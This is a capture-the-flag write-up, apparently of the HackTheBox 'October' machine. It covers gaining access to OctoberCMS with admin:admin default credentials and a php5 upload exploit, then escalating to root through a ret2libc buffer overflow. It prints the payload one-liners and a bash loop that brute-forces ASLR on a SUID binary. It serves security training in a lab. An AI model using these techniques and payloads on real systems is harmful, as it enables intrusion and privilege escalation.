
# October

## Gaining Access

Nmap scan:

<figure><img src="/files/oE4xFBs8bBtgJX1IXqFu" alt=""><figcaption></figcaption></figure>

We don't need to add anything into the hosts file.

### OctoberCMS

The website was running OctoberCMS and appears to have a default look:

<figure><img src="/files/dnttOfJrRjOtwDk7WVTM" alt=""><figcaption></figcaption></figure>

Registering an account and trying it out got us nowhere: the account had no useful functionality. Instead, we can take advantage of the fact that OctoberCMS is an open-source project whose layout is well documented. A quick Google search reveals that the backend is at `/backend`:

{% embed url="https://octobercms.com/forum/post/how-do-i-access-the-backend" %}

<figure><img src="/files/uDd3lL2AJqhgsUbNsMNx" alt=""><figcaption></figcaption></figure>

We can use the default credentials of `admin:admin`.

<figure><img src="/files/FoDCbEZldg2YphhGnWZm" alt=""><figcaption></figcaption></figure>

OctoberCMS has quite a few exploits:

{% embed url="https://www.exploit-db.com/exploits/41936" %}

We can use one of them to upload a `cmd.php5` file and execute it on the server, since the `php5` extension is not blocked by the upload filter:

<figure><img src="/files/vM3n6KVMvznBdpecV1k2" alt=""><figcaption></figcaption></figure>

We can confirm we have RCE via `curl`.

<figure><img src="/files/AnZiNX1uSsVDozqybd73" alt=""><figcaption></figcaption></figure>

Getting a reverse shell is then trivial.

## Privilege Escalation

### Ret2Libc

I ran a LinPEAS scan on the machine and found this weird SUID binary called `ovrflw`:

<figure><img src="/files/UFYTmKnho34SEEs7PpO7" alt=""><figcaption></figcaption></figure>

I opened it up in Ghidra to view what it does:

<figure><img src="/files/RZ2pKyKa4WDQbUbtF3JP" alt=""><figcaption></figcaption></figure>

It appears we have a classic BOF exploit to do here. The `strcpy` call is vulnerable, and the buffer is pretty short. Running `checksec` reveals that NX is enabled but PIE is disabled:

```
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```

In this case, we can go for a Ret2Libc attack: NX stops us from running shellcode on the stack, but with PIE disabled we can return into `libc` instead. First, we find the buffer size:

<figure><img src="/files/JykLjI5fsnHObLEC4bZa" alt=""><figcaption></figcaption></figure>

It appears to be fixed at 112 bytes (the same as the length of `local_74`). Now, we can use `ldd` to find the address where `libc` is loaded on the machine:

<figure><img src="/files/qkmELsk9WH7a3E51xVzs" alt=""><figcaption></figcaption></figure>

Then we can simply execute the following commands to get the addresses we need:

```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
strings -a -t x /lib/i386-linux-gnu/libc-2.27.so | grep "/bin/sh"
```

Afterwards, we can use a Python 2 one-liner to print the payload: 112 bytes of padding followed by the addresses of `system`, `exit` and the `/bin/sh` string, each written in little-endian order:

{% code overflow="wrap" %}

```bash
python2 -c 'print "\x90" * 112 + "\x10\x83\x62\xb7" + "\x60\xb2\x61\xb7" + "\xac\xab\x74\xb7"'
```

{% endcode %}

When run, however, it didn't work on the machine. It turns out ASLR was enabled, which can be verified in `/proc/sys/kernel/randomize_va_space`; checking the `libc` address repeatedly confirmed that it shifts on every run.

In this case, we can check the **range of addresses which ASLR spans**. The range looks rather small, since `libc` is loaded at roughly the same location each time:

```
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc  
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b1000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb763b000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7606000)
www-data@october:/home/harry$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7626000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7591000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7624000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)
www-data@october:/dev/shm$ ldd /usr/local/bin/ovrflw | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7567000)
```
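To put a number on how small that range is, here is an added Python snippet (not part of the original writeup) that parses the `ldd` observations above and estimates how many page-aligned `libc` bases a fixed guess has to cover; the sample text is constructed from those eight lines, and the uniform-distribution assumption is mine.

```python
import math
import re

# Constructed sample input: the eight ldd observations shown in the writeup.
LDD_OUTPUT = """\
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b1000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb763b000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7606000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7626000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7591000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7624000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7567000)
"""

PAGE = 0x1000  # mmap granularity on i386; load bases are always page aligned
LIBC_RE = re.compile(r"libc\.so\.6 => \S+ \(0x([0-9a-f]+)\)")


def parse_libc_bases(ldd_text):
    """Return the libc load addresses found in ldd output, as integers."""
    return [int(m.group(1), 16) for m in LIBC_RE.finditer(ldd_text)]


def summarize_aslr(bases):
    """Estimate the ASLR search space from a sample of observed libc bases."""
    if not bases:
        raise ValueError("no libc bases to analyse")
    lo, hi = min(bases), max(bases)
    # The observed spread is only a lower bound on the true randomisation range.
    candidates = (hi - lo) // PAGE + 1
    return {
        "min_base": lo,
        "max_base": hi,
        "page_aligned": all(b % PAGE == 0 for b in bases),
        "candidate_pages": candidates,
        # Entropy the brute force actually has to defeat, in bits.
        "observed_bits": math.ceil(math.log2(candidates)),
    }


def prob_hit_within(attempts, candidates):
    """Probability that a fixed guess matches at least once in `attempts`
    runs, assuming the base is uniform over `candidates` pages."""
    return 1.0 - (1.0 - 1.0 / candidates) ** attempts


if __name__ == "__main__":
    info = summarize_aslr(parse_libc_bases(LDD_OUTPUT))
    print({k: hex(v) if k.endswith("base") else v for k, v in info.items()})
    print("P(success within 228 runs) = %.3f" % prob_hit_within(228, 228))
```

Roughly 8 bits of entropy is consistent with the 8 bits of mmap randomisation a 32-bit Linux kernel applies by default, which is why a loop of a few hundred runs is enough here; a 64-bit process gets 28 bits, which is what makes the same approach impractical there.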

So, we can set up a `bash` loop that keeps running the binary with a fixed guess until the `libc` base happens to match and the exploit succeeds.

{% code overflow="wrap" %}

```bash
while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done
```

{% endcode %}

<figure><img src="/files/80pPIcnbRSD0WfM5yPwL" alt=""><figcaption></figcaption></figure>

Rooted!
